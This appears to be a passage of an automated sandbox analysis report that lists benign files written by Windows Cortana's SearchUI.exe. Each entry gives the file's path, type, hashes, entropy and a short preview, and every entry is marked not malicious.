                      Preview: /*!DisableJavascriptProfiler*/.var BM=BM||{};BM.config={B:{timeout:1e3,delay:750,maxUrlLength:300,sendlimit:20,maxPayloadSize:7e3},V:{distance:20},N:{maxUrlLength:300},E:{buffer:30,timeout:5e3,maxUrlLength:300},C:{distance:50}},function(n){function st(){if(!document.querySelector||!document.querySelectorAll){p({FN:"init",S:"QuerySelector"});return}y={};f=[];nt=1;g=0;d=0;e=[];o=0;s=!1;var n=Math.floor(Math.random()*1e4).toString(36);t={P:{C:0,N:0,I:n,S:dt,M:i,T:0,K:i,F:0}};fi()}function ni(n,t){var r={};for(var i in n)i.indexOf("_")!==0&&(i in t&&(n[i]!==t[i]||i==="i")?(r[i]=t[i],n[i]=t[i]):r[i]=null);return r}function ti(n){var i={};for(var t in n)n.hasOwnProperty(t)&&(i[t]=n[t]);return i}function it(n,t,i,r){if(!s){p({FN:"snapshot",S:n});return}i=i||pt;t=t||!1;var u=b()+i;rt(e,n)===-1&&e.push(n);t?(ht(),ct(t,r)):u>o&&(ht(),d=sb_st(ct,i),o=u)}function p(n){var f={T:"CI.BoxModelError",FID:"CI",Name:ft,SV:et,P:t&&"P"in t?w(t.P):i,TS:r(),ST:l},u,e;for(u in n)f[u]=n[u];e=w(f);lt(e)}functio
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\6C6MUTHU\www.bing[1].xml
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:ASCII text, with very long lines, with no line terminators
                      Category:dropped
                      Size (bytes):20183
                      Entropy (8bit):5.569509322281312
                      Encrypted:false
                      SSDEEP:384:5Qilq95lq9NaepHC4o6y+Z++eS6y+uTn8ETn8P2SNcgkHxmdEf5+JZfEb6lbRKXT:Gilg5lgNXHzo6XZ++f6XuT8ET8ugSSb+
                      MD5:27CB8311FA205EFA6C096C6675230EFF
                      SHA1:2A0E2990A4BA547CD64C8C7F702B2A23A600B895
                      SHA-256:04F0FD3CFBAC8432426B7B6FA63AEA45E463384DE23A1606322A071B3A3C3570
                      SHA-512:E1E47BBC3D23030E1B8EA89AD7453AFA26FBF02CC74566A961661DF20DFD81437EABB5ABC3E73AA0EBDE9A77BF9DAAD6B5C63DED98EE5EB29C2819BC971DA9E9
                      Malicious:false
                      Preview: <root><item name="eventLogQueue_Online" value="[]" ltime="3950151987" htime="30860101" /></root><root><item name="eventLogQueue_Online" value="[]" ltime="3950151987" htime="30860101" /><item name="CB47C15FA3044AB884F7E32B9FD32ED2" value="1" ltime="3967458428" htime="30860101" /></root><root><item name="eventLogQueue_Online" value="[]" ltime="3950151987" htime="30860101" /></root><root><item name="eventLogQueue_Online" value="[]" ltime="3950151987" htime="30860101" /><item name="eventLogQueue_Online_logUploadIntervalStartDate" value="1609839249586" ltime="3969033662" htime="30860101" /></root><root><item name="eventLogQueue_Online" value="[]" ltime="3950151987" htime="30860101" /><item name="eventLogQueue_Online_logUploadIntervalStartDate" value="1609839249586" ltime="3969033662" htime="30860101" /><item name="eventLogQueue_Online_uploadedLogSizeInInterval" value="0" ltime="3969107766" htime="30860101" /></root><root><item name="eventLogQueue_Online" value="[{&quot;log&quot;:{&quot;type
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_AutoGenerated_{116229A7-9A3B-2078-DB5F-B5A20811242C}
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):3.327637327658332
                      Encrypted:false
                      SSDEEP:96:t6KSBgr/BnHaQt2RGHHHHHHHHHJY4zz4suN4o5FfCiKHUWjgHRYmz3sEAdQ53kp5:tv5/BHai2YDvn2F4HUWjWRYW3sE/3Ug
                      MD5:6B91588A3B75F9948D9E472F43B090D6
                      SHA1:A667BEDAE6B8F23ACF0A81C05469C1B9FFD565C8
                      SHA-256:012924F01B3F701E0286E928D2C636867A7FAF6F50CE2F72120C2A3B6CA690FB
                      SHA-512:82F5F2FD870B92A1E8AC4B4BFC381FE04CF2EE227E0BD5286D099F66E0AF864FD9C29AB3351129F91287722B2B3A5F485F3D93EE613271B13BB3EBD2B79A04C3
                      Malicious:false
                      Preview: BM............|...`...`..... ......................................... niW...........................................................................................................................................................................................................................................1...Q...|.................................................z...N...0...........................................................................................................................................................................................................................................................................................................E..................................................................................................C..............................................................................................................................................................................................................................
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_AutoGenerated_{8AA47365-B2B3-1961-69EB-F866E376B12F}
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):5.34033989669677
                      Encrypted:false
                      SSDEEP:384:8B0oQuMwZSRk5Q/YsS+Z6RyNk+BVfiMpOAm7lLmZL7C/tH0gDTT4jwjqzJgnXx6u:8yurZSRT/Y/+EElOA4lS8mKhMJI
                      MD5:9F1FF11E31C55A87372E85612CA3C290
                      SHA1:C94DC58D7E8F070D3EEFF5BC8ECB3A2D7008323D
                      SHA-256:0C650065D284A6A0F6A17CE2250214B40219B7082E940689A2CD2948162FD893
                      SHA-512:DD490E167B4455AACE73DDA6D9EC6B90AEE5E5994701C249A44D316B17C3F8A8F5E776E9ECB6D751DFBED8E74743A3F13D95EDBBF3B09998E148BFCBA1EF721F
                      Malicious:false
                      Preview: BM............|...`...`..... ......................................... niW..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_AutoGenerated_{8DA2943B-094F-3D66-6152-6200F3669B3B}
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):2.637977059894628
                      Encrypted:false
                      SSDEEP:768:XmmmmmmmmmmmmmmmmmmmmmydiXjPJdKQ7ai3ZigbmY9//JD9UZ99tS0FVGn4YEbR:fig1Z
                      MD5:8AAAD0F4EB7D3C65F81C6E6B496BA889
                      SHA1:231237A501B9433C292991E4EC200B25C1589050
                      SHA-256:813C66CE7DEC4CFF9C55FB6F809EAB909421E37F69FF30E4ACAA502365A32BD1
                      SHA-512:1A83CE732DC47853BF6E8F4249054F41B0DEA8505CDA73433B37DFA16114F27BFED3B4B3BA580AA9D53C3DCC8D48BF571A45F7C0468E6A0F2A227A7E59E17D62
                      Malicious:false
                      Preview: BM............|...`...`..... ......................................... niW................................................................................???(III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-:::'....PPP)...4...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...5:::'ddd0...$..........................................................................
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_AutoGenerated_{923DD477-5846-686B-A659-0FCCD73851A8}
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):4.4076523679367945
                      Encrypted:false
                      SSDEEP:384:RP2VsaVeazApIvzLEYXqK8nsNkhHZt6hkB:qsacakpIv1XDQDH6
                      MD5:0705D6835877CF0E3C45FC7427647C75
                      SHA1:B03330CD06F821600BB0323E7C2277311F065F6F
                      SHA-256:B04759FEE392D36CC20A319943C4DDAC356CD1FBED6223A4961688689350A84E
                      SHA-512:0FAAF02180EF6EA2A8A74AB2BE7B72BE24EFF69E5AECDF97BEC838A637E7B3EFB85FFED32C2E035B2100615E2711CCCBE8AFE231EC55A7245D00D6C98329D83C
                      Malicious:false
                      Preview: BM............|...`...`..... ......................................... niW..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_AutoGenerated_{BB044BFD-25B7-2FAA-22A8-6371A93E0456}
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):3.9609861318177852
                      Encrypted:false
                      SSDEEP:384:c1VHQVZVSVVb/g0VBRL+SVoxycdz74t9byqQes5oVn0D:c1VwVZVSVVb/DVBRCyA74tLQes5oVn0
                      MD5:6BA483C92ECC054466753E522DB97936
                      SHA1:F46A0ED2D9D68A979241974F1588D076F64F68AA
                      SHA-256:25B4C976977835C431D466DB710FF3D5861CACC4E77683EC6FD4D5C9D5AE0AFD
                      SHA-512:BA9FCC6B649BA53BBEAD16CC9E47741FBF4ABB3D115212B15931D7E759B07A3DDD926042EBC93DC1887DD25DD33044C44BAE4FCAF2452217D7D1180B1B269F0B
                      Malicious:false
                      Preview: BM............|...`...`..... ......................................... niW..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_AutoGenerated_{BD3F924E-55FB-A1BA-9DE6-B50F9F2460AC}
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):5.016255257321986
                      Encrypted:false
                      SSDEEP:384:rqR7f4IL0WIon6qn10OvvbTgUYZDTNfM56ElfxT1StD005V2ULKVehiWATb:mR7wfqn10OriZf9g4fz/KcgW6b
                      MD5:E799EFF0B7816A5587D146F9BB951F1F
                      SHA1:28F99125424D8E0647ED01A21C378362DE181CDB
                      SHA-256:DAEE10EEF8CDAD237BEE08E5429E529BCA3B7A10C1BD76578588108A3A6B272B
                      SHA-512:02AD638295B2A21C3B4367E7F3EF345B81E3BA8C62C61A97EF51B1F102C28B2FD6863F3CA1B3B87051EC95DA92C42A8BFCD4E0ADF18CEBD3DE0A2C27A388D563
                      Malicious:false
                      Preview: BM............|...`...`..... ......................................... niW.......................................................................................................................................................................................................................................................................................................................................................................%...*...................................................................................................................................................................................................................................................................................................................................................................9. ].-3..9H..GZ..Mc..[w.C...#?J....0..........................................................................................................................................................................
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_AutoGenerated_{C1C6F8AC-40A3-0F5C-146F-65A9DC70BBB4}
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):5.248171854641737
                      Encrypted:false
                      SSDEEP:768:FSkObxrpH58SQedKP7oBMHNzOGpXXXYySXTzBq:IkObxrt58SHdKP7oBMwyXXIySjV
                      MD5:2E455B88290024BA91A90DEB1F194A19
                      SHA1:D17027449BFFEF8C398FF1FFD8FBF078171805EA
                      SHA-256:65AFC3F47F89F404BB847ECA3C445BCBB15AF5FE0905FC050FCB6B6D2F6D00CC
                      SHA-512:1CEA9D5922894FE900DF5B186AF735997CDC2132CCDCE5690681F4E55608C5C9DBFD5B072C81453AC7456DF7FE6577F55E5F86900363FD3ACFAFA78DBCD6AC5F
                      Malicious:false
                      Preview: BM............|...`...`..... ......................................... niW..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_AutoGenerated_{C804BBA7-FA5F-CBF7-8B55-2096E5F972CB}
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):5.34033989669677
                      Encrypted:false
                      SSDEEP:384:8B0oQuMwZSRk5Q/YsS+Z6RyNk+BVfiMpOAm7lLmZL7C/tH0gDTT4jwjqzJgnXx6u:8yurZSRT/Y/+EElOA4lS8mKhMJI
                      MD5:9F1FF11E31C55A87372E85612CA3C290
                      SHA1:C94DC58D7E8F070D3EEFF5BC8ECB3A2D7008323D
                      SHA-256:0C650065D284A6A0F6A17CE2250214B40219B7082E940689A2CD2948162FD893
                      SHA-512:DD490E167B4455AACE73DDA6D9EC6B90AEE5E5994701C249A44D316B17C3F8A8F5E776E9ECB6D751DFBED8E74743A3F13D95EDBBF3B09998E148BFCBA1EF721F
                      Malicious:false
                      Preview: BM............|...`...`..... ......................................... niW..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_AutoGenerated_{DAA168DE-4306-C8BC-8C11-B596240BDDED}
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):3.165623013739233
                      Encrypted:false
                      SSDEEP:384:qWF8n4AeWgpCOp2rtRunpj+3Yliy3gTs2ojDKgYeh:q0m4AXgpzeRunpjXwo2ojDKgY
                      MD5:855718D0BD86E35B1D42CEABDCFC61B3
                      SHA1:2A6698C8231E2FA27F93FD5141A252A4B06251B1
                      SHA-256:78C940DE004462F42D6BD01AAA33CD73F2C3B06652730C385F1F9C4760AC9537
                      SHA-512:BEA1A7AC95E76B120C65BCE325D87C27D385F992C6B95DEF100BA50FC4E7EAF13C61C10BD95231046885A17AFA1ABA3FC4158D095360CAA46412AE8B136288B8
                      Malicious:false
                      Preview: BM............|...`...`..... ......................................... niW..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_AutoGenerated_{FBFBA9BA-D159-E700-1D51-AC1FBB779882}
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):2.637977059894628
                      Encrypted:false
                      SSDEEP:768:XmmmmmmmmmmmmmmmmmmmmmydiXjPJdKQ7ai3ZigbmY9//JD9UZ99tS0FVGn4YEbR:fig1Z
                      MD5:8AAAD0F4EB7D3C65F81C6E6B496BA889
                      SHA1:231237A501B9433C292991E4EC200B25C1589050
                      SHA-256:813C66CE7DEC4CFF9C55FB6F809EAB909421E37F69FF30E4ACAA502365A32BD1
                      SHA-512:1A83CE732DC47853BF6E8F4249054F41B0DEA8505CDA73433B37DFA16114F27BFED3B4B3BA580AA9D53C3DCC8D48BF571A45F7C0468E6A0F2A227A7E59E17D62
                      Malicious:false
                      Preview: BM............|...`...`..... ......................................... niW................................................................................???(III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-:::'....PPP)...4...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...5:::'ddd0...$..........................................................................
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_BingWeather_8wekyb3d8bbwe!App
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 44 x 44 x 32
                      Category:dropped
                      Size (bytes):7894
                      Entropy (8bit):1.1095084859402944
                      Encrypted:false
                      SSDEEP:12:mqYmuXf9N9N9N0tXsPXI7XfnH/H8tMt3vH1df/nHF9FTfBF9F9H/nfsdvHn33JpY:mqhZ0aQY
                      MD5:0F370F0614A3FD886ECA312155DFFAD4
                      SHA1:D1226B4766895F3EC28E20D6487DC96A59834D51
                      SHA-256:A4BE3AAC061D032A2FA24D58D56ED0718F3309D7871E080F1C039F48EF74FC33
                      SHA-512:E5B15E355B3EE0DD1BE809F44AA9A03391D977E35F09ED3BD1DE25A93DC604ADDFD7EB014FEEF1AC9D958C95EFEF1C8593DFB2E2CF3D8C0BCBE6D40C827AD5C5
                      Malicious:false
                      Preview: BM............|...,...,..... ......................................... niW..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_GetHelp_8wekyb3d8bbwe!App
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 44 x 44 x 32
                      Category:dropped
                      Size (bytes):7894
                      Entropy (8bit):0.95774981000546
                      Encrypted:false
                      SSDEEP:12:mqYmu/yflf7S2L2LOLii+6jf+G2/qGqmKeTr/iuuK6SGqGbLqKmwy662K2faPCPw:mq3RfKin+WjLK/iSLent67zP/
                      MD5:D7573DDE6CE9E43B7BDDFFD5E7538165
                      SHA1:CE196EEEF030650B1DEEE42CFB4164B8AAE1414B
                      SHA-256:CA5DA1F7CF38E128E909FDAF89C79EE595332575344366FE5FBC849683DCF0F8
                      SHA-512:508540A0B66FCAA42D3DC375EE655C04EB31199F0EF0D71B39FCEF269B9FC60B1D398D11A63A685E3336E19DAB846B6176CAC613E89934EB4AD0D10ED29E77EA
                      Malicious:false
                      Preview: BM............|...,...,..... ......................................... niW..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Getstarted_8wekyb3d8bbwe!App
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 44 x 44 x 32
                      Category:dropped
                      Size (bytes):7894
                      Entropy (8bit):0.8922953628480119
                      Encrypted:false
                      SSDEEP:6:mqtgX/mu0000000000000000000000000000000000000000000000000000000o:mqYmu7K+3a3aiO/C2i3v33uCjaL
                      MD5:088DA920D5C27B02630F2B0E26F78D07
                      SHA1:F0294ED86DE947640D734D90A2597C00C2D882EB
                      SHA-256:975FF9F02FF7DCF059FDCD7F81096F479BEA409F2A9D0784E4C24402E604F4E1
                      SHA-512:3994ECA522D56598B5790D54840B363C6F3C8AE8C0BFEFF7C2F6B8391CF1221FE071254CA52C02FA9EC960657BDFE9B0F85D6A3E37AB66CAB6FBF978CD6687DA
                      Malicious:false
                      Preview: BM............|...,...,..... ......................................... niW..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_InternetExplorer_Default
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):4.300929850213194
                      Encrypted:false
                      SSDEEP:384:dI2sma3bU7UbCbH/1BD1RmXJEFjmvqSO/vUTAdF+vkTOhV0k1vh:MmaA7UbCbH/71R7PdQvkChVf
                      MD5:3F7A4B60EACE07C59CA0C9072FE1A711
                      SHA1:06758E981F2EFAFB5822873D36B218E40CD7EE94
                      SHA-256:8FDC9FDD3ADFE90A6BF4765C9B614B7072ECE2BFBA319D09B8E437B33A59FC4F
                      SHA-512:1227E79685832D7B850677170BF4E04C895776D05628030267D3D659B675CE85ADBE2DD7E2423BA46969264903DD74D4A243B9747E8B07031B11CF7F4A9785FA
                      Malicious:false
                      Preview: BM............|...`...`..... ......................................... niW..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Messaging_8wekyb3d8bbwe!x27e26f40ye031y48a6yb130yd1f20388991ax
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 66 x 66 x 32
                      Category:dropped
                      Size (bytes):17574
                      Entropy (8bit):0.6874694166330877
                      Encrypted:false
                      SSDEEP:12:gqYmu3myaGO/GeyLi6ybqrPC6Cq2qbyaiT:gqazDGGeGf2ePfP2Ov8
                      MD5:410F5D365C0E5B8AB2BAACE73D5E2AC4
                      SHA1:8FF55D6286FABDD6DC9DBEDEF9B489A8BBF0E0D1
                      SHA-256:DA426537185759CF35B42D7D433B7F614B82F2B6FDE76272BB6AE5858D2C07DA
                      SHA-512:3293C271B4D19CA00FF2ED491955D4FF77A2CE95261ADAEC21C2E344CB5F8EA1834AAAE9FF161E3F3E5C87487ED0C30E7237CB69C61B71FFADAEBD3C8CB181CE
                      Malicious:false
                      Preview: BM.D..........|...B...B..... ......................................... niW..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 44 x 44 x 32
                      Category:dropped
                      Size (bytes):7894
                      Entropy (8bit):0.9615285749764766
                      Encrypted:false
                      SSDEEP:24:mqZEjX6jg88HH/xUx48VjxqNa/hJPEpjq/j/i/:kjX6jLkJW48Lqk5Kc7K
                      MD5:A0E8C463875933C8F29F5B35DCA52D0B
                      SHA1:8A76673A986394F65691174A30EE1E7B9389FCD5
                      SHA-256:3B61D5489BAD522B2705FB0025BF7F1E34ADE73619B5138A7F1264014E7AC7B8
                      SHA-512:09A92C02E73E6EC31C351C801C6CC477EBD5F7B09BBF2E0A877D58434BBF19ECD7772AF55F162D78DDA51E3221FF8A9E1D6315CFFF67746C83316FE136B72811
                      Malicious:false
                      Preview: BM............|...,...,..... ......................................... niW..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_MicrosoftOfficeHub_8wekyb3d8bbwe!Microsoft_MicrosoftOfficeHub
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 44 x 44 x 32
                      Category:dropped
                      Size (bytes):7894
                      Entropy (8bit):2.404889068864702
                      Encrypted:false
                      SSDEEP:192:TS7i7G7I7I7I7I7I7I7I7I7I7I7I7I7I7I7I7vEjz:TS7i7G7I7I7I7I7I7I7I7I7I7I7I7I7l
                      MD5:321A73AF0AD9A4A0C171026AFCED10CF
                      SHA1:C53CCEB354AEA9729F3A8B3A1A48D0F33233EF18
                      SHA-256:14D29ABB1E17427846F055B96A738C822D517AA8F329CD9962E3E79058949935
                      SHA-512:0D595E97C7794F85DAD9B99310BE1C5D7ABFAEEC8AF939840DD54896815AA53CA2D44694DA21CA2C19AF066CC9DDD642C4303EEF37B3C4337F23030F2B359C8D
                      Malicious:false
                      Preview: BM............|...,...,..... ......................................... niW.............................................................................;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_MicrosoftSolitaireCollection_8wekyb3d8bbwe!App
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 44 x 44 x 32
                      Category:dropped
                      Size (bytes):7894
                      Entropy (8bit):1.1579699636009178
                      Encrypted:false
                      SSDEEP:48:FzRT+RKlUMf8fefnzye2a59ZGSVFLwZPF:pJxfzl9ZlFLwr
                      MD5:FD7D542ED6A213D62851DAF5B4872B58
                      SHA1:8458AA63DCEA54B3E2378183D1C69FAF288E76B9
                      SHA-256:89701D14E70B95EBC8CD976CE8F61CD5278EFFF80A2A2389B47DD2933AFADAE6
                      SHA-512:87A20815FA48212157A3860F18F2D31999042AEE36040B236BF0EE13EAAAE99DFCE435BECDE1C11586270271183FE17E7D692D149D86D4D0C51B6ED8819ADD03
                      Malicious:false
                      Preview: BM............|...,...,..... ......................................... niW.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................C...................=..
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_MicrosoftStickyNotes_8wekyb3d8bbwe!App
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 44 x 44 x 32
                      Category:dropped
                      Size (bytes):7894
                      Entropy (8bit):2.0961750368604006
                      Encrypted:false
                      SSDEEP:24:mqSp13tBre9bHXwHsIuYpberQ5rfO9oUO:k3jrcTXssINbSgrfp
                      MD5:BF20B0FE7280C69AB57E6EEF1D16C29C
                      SHA1:6A3CA709DD4ABF8033C1A2B8E9F6CAB315445D23
                      SHA-256:43826FA4A929F9CFD492AE9EEB0DCDE75147DFE2E2CFD36D1B1372B45BB13F27
                      SHA-512:6C049418533D3C2FDF1137E055EA438964BBA9234A475AE816580C060C45E6F5E001C60438823FEB4832A92C6EE1159C9A1951324AFB43261FC9A2EFD897453D
                      Malicious:false
